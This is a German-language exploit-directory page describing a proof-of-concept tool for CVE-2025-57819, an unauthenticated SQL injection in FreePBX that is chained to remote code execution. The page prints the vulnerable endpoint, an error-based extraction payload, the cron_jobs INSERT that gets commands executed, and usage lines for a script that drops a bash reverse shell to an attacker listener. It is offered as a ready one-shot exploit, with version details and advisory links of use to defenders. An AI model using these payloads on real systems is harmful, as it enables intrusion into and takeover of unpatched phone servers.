Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-57819-poc — CVE-2025-57819 -> rce | Kitploit
Tools/GitHubGitHub/b4sh2/cve-2025-57819-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubb4sh2/cve-2025-57819-poc

CVE-2025-57819-poc

CVE-2025-57819 -> rce

Repository anzeigen
7246vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-57819 — FreePBX nicht authentifizierte SQLi → RCE

One-Shot-Exploit für die nicht authentifizierte SQL-Injection im FreePBX Endpoint Manager (CVE-2025-57819), verkettet zur Remote-Codeausführung über die FreePBX-Tabelle cron_jobs.

Nur für autorisierte Sicherheitstests / CTF-Nutzung.


Schwachstelle

Der AJAX-Handler des Endpoint-Moduls verkettet den Parameter brand direkt in eine SQL-Abfrage, und der Modulpfad FreePBX\modules\endpoint\ajax umgeht die AJAX-Referrer-/Authentifizierungsprüfung. Das ermöglicht eine nicht authentifizierte, fehlerbasierte SQL-Injection (über EXTRACTVALUE) mit aktivierten gestapelten Abfragen (Schreibzugriff).

Injektionspunkt:

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax
    &command=model&template=x&model=model&brand=<INJECTION>

Beweis (fehlerbasiertes Auslesen):

root@kitploit:~
brand=x' AND EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~')) -- -
→ {"error":{"message":"... XPATH syntax error: '~freepbxuser@localhost~' ..."}}
Tool herunterladen

Betroffen: FreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3.

RCE-Technik

Die Injection ist für sich genommen schreibgeschützt, aber gestapelte Abfragen ermöglichen Schreibvorgänge. FreePBX führt Aufträge aus der Tabelle cron_jobs über seinen Cron-Manager aus, sodass das Einfügen einer Zeile eine beliebige Befehlsausführung ermöglicht (innerhalb von ~60 s, Zeitplan * * * * *):

root@kitploit:~
INSERT INTO cron_jobs
  (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)
VALUES ('sysadmin','<job>','<os-command>',NULL,'* * * * *',30,1,1);

Der injizierte Befehl ist eine Bash-Reverse-Shell. Die Cron-Zeile wird nach dem ersten Callback automatisch entfernt, um wiederholte Verbindungen zu vermeiden.

Anforderungen

root@kitploit:~
pip install requests urllib3

Python 3. Die eingebaute IP-Erkennung (-i/--interface) ist nur für Linux verfügbar; verwenden Sie auf anderen Plattformen --ip.

Verwendung

root@kitploit:~
# Defaults: interface tun0, port 4444 — starts listener, exploits, drops a shell
python3 exploit.py http://{target}

# Pick a different interface / port
python3 exploit.py http://{target} -i eth0 -p 9001

# Set the listener IP explicitly
python3 exploit.py http://{target} --ip 10.10.15.52

python3 exploit.py --help

Das Skript:

  1. Bestätigt die SQLi (leakt die DB-Version).
  2. Startet einen TCP-Listener auf dem gewählten Port.
  3. Injiziert den Reverse-Shell-Cron-Job und prüft, ob die Zeile angekommen ist.
  4. Wartet ~70 s auf den Callback und gibt Ihnen dann eine interaktive Shell (mit einem automatischen PTY-Upgrade-Versuch).
  5. Entfernt die injizierte Cron-Zeile.

Referenzen

  • Horizon3.ai — Aktualisierte FreePBX-CVEs: Auth-Bypass & RCE
  • watchTowr Labs — FreePBX CVE-2025-57819
  • watchTowr PoC (GitHub)
  • NVD — CVE-2025-57819
  • FreePBX-Advisory GHSA-m42g-xg4c-5f3h